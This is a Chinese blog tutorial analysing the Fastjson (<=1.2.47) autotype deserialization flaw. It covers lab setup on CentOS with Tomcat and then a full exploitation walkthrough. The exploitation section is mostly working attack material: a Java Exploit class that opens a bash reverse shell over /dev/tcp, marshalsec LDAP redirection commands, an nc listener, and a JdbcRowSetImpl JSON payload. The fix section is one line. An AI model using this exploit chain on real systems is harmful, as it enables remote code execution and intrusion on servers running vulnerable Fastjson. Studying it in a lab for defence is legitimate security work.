溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何實現Fastjson漏洞分析

發布時間:2021-12-14 10:12:44 來源:億速云 閱讀:273 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關如何實現Fastjson漏洞分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

0x01簡介

fastjson 是阿里巴巴的開源JSON解析庫,它可以解析 JSON 格式的字符串,支持將 Java Bean 序列化為 JSON 字符串,也可以從 JSON 字符串反序列化到 JavaBean。

 FastJson特點如下:

(1)能夠支持將java bean序列化成JSON字符串,也能夠將JSON字符串反序列化成Java bean。

(2)顧名思義,FastJson操作JSON的速度是非??斓?。

(3)無其他包的依賴。

(4)使用比較方便。如何實現Fastjson漏洞分析

0x02漏洞介紹

Fastjson提供了autotype功能,允許用戶在反序列化數據中通過“@type”指定反序列化的類型,Fastjson自定義的反序列化機制時會調用指定類中的setter方法及部分getter方法,那么當組件開啟了autotype功能并且反序列化不可信數據時,攻擊者可以構造數據,使目標應用的代碼執行流程進入特定類的特定setter或者getter方法中,若指定類的指定方法中有可被惡意利用的邏輯(也就是通常所指的“Gadget”),則會造成一些嚴重的安全問題。并且在Fastjson 1.2.47及以下版本中,利用其緩存機制可實現對未開啟autotype功能的繞過。

0x03影響版本

Fastjson <= 1.2.47

0x04環境搭建

虛擬機:centos7

所需環境:jdk8

JDK8下載地址:https://pan.baidu.com/s/1nuxQJkYwkY2UOaPEIshQig 提取碼:lc0i

Tomcat

Tomcat下載地址:https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.36/bin/

Fastjson1.2.47

Fastjson1.2.47下載地址:鏈接:https://pan.baidu.com/s/1D0gDc3NGXlHQ2Yamy4zHtQ  提取碼:ps2p

本地搭建Tomcat

1、安裝jdk8并配置環境變量

首先在usr目錄下創建一個java的目錄

mkdir /usr/java如何實現Fastjson漏洞分析

2、將下載好的jdk8的安裝包放在usr/java目錄下,使用tar解壓,mv重命名

tar zxvf jdk-8u141-linux-x64.tar

mv jdk-8u141-linux-x64.tar/  jdk8   //重命名為jdk8如何實現Fastjson漏洞分析

3、配置系統環境變量,使用vim編輯profile文件

vim /etc/profile  在最后一行加上一下代碼

export JAVA_HOME=/usr/java/jdk8

export CLASSPATH=.:$JAVA_HOME/jre/lib/rt.jar:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar

export PATH=$PATH:$JAVA_HOME/bin

如何實現Fastjson漏洞分析

保存后使用java -version 查看是否配置成功如何實現Fastjson漏洞分析

Java環境安裝好,再來安裝Tomcat

把Tomcat傳上Centos7上,使用tar zxvf apache-tomcat-9.0.36.tar.gz解壓如何實現Fastjson漏洞分析

使用命令重命名tomcat

mv apache-tomcat-9.0.27 tomcat9  //重命名為tomcat9如何實現Fastjson漏洞分析

授予tomcat9這個文件夾為777權限

chmod 777 tomcat9/如何實現Fastjson漏洞分析

把tomcat的加入到環境變量

vim /etc/profile

export CATALINA_HOME=/tomcat9  //存放tomcat的目錄如何實現Fastjson漏洞分析

應用環境變量

source  /etc/profile

啟動tomcat,進入tomcat9下的bin目錄

cd tomcat9/bin

sudo ./catalina.sh start   //啟動tomcat

如何實現Fastjson漏洞分析

瀏覽器訪問http://ip:8080 查看如何實現Fastjson漏洞分析

復制fastjson1.2.47到webapps文件夾下,解壓,訪問出現hello word環境即搭建成功如何實現Fastjson漏洞分析

0x05漏洞利用

1、編譯生成Exploit.class

首先將以下代碼保存為Exploit.java,反彈shell命令在代碼內,可自行更改

import java.io.BufferedReader;

import java.io.InputStream;

import java.io.InputStreamReader;




public class Exploit{

    public Exploit() throws Exception {

        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/xx.xx.xx.xx/1888;cat <&5 | while read line; do $line 2>&5 >&amp5; done"});

        InputStream is = p.getInputStream();

        BufferedReader reader = new BufferedReader(new InputStreamReader(is));




        String line;

        while((line = reader.readLine()) != null) {

            System.out.println(line);

        }




        p.waitFor();

        is.close();

        reader.close();

        p.destroy();

    }




    public static void main(String[] args) throws Exception {

    }

}

然后編譯Exploit.java,會生成一個Exploit.class文件

javac Exploit.java如何實現Fastjson漏洞分析

2.開啟3個監聽窗口

第一個使用python3開啟一個臨時服務,然后把編譯好的Exploit.class文件放至web目錄下,使瀏覽器訪問會下載

python -m http.server 8000如何實現Fastjson漏洞分析

注:此步是為了接收LDAP服務重定向請求,需要在payload的目錄下開啟此web服務,這樣才可以訪問到payload文件

第二個服務器使用剛才下載的工具marshalsec開啟LDAP服務監聽:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.10.106:8000/#Exploit 6666如何實現Fastjson漏洞分析

注:使用marshalsec工具快捷的開啟LDAP服務,借助LDAP服務將LDAP reference result 重定向到web服務器

第3個,開啟nc監聽設定的端口

Nc -lvnp 4444如何實現Fastjson漏洞分析

訪問fastjson頁面使用Burp抓包,構造數據包修改為POST請求,使用EXP

{

    "name":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "x":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"ldap://ip:9999/Exploit",

        "autoCommit":true

    }




}

發送后可以看到nc監聽窗口成功得到shell如何實現Fastjson漏洞分析

0x06修復方式

將Fastjson升級到最新版本

以上就是如何實現Fastjson漏洞分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女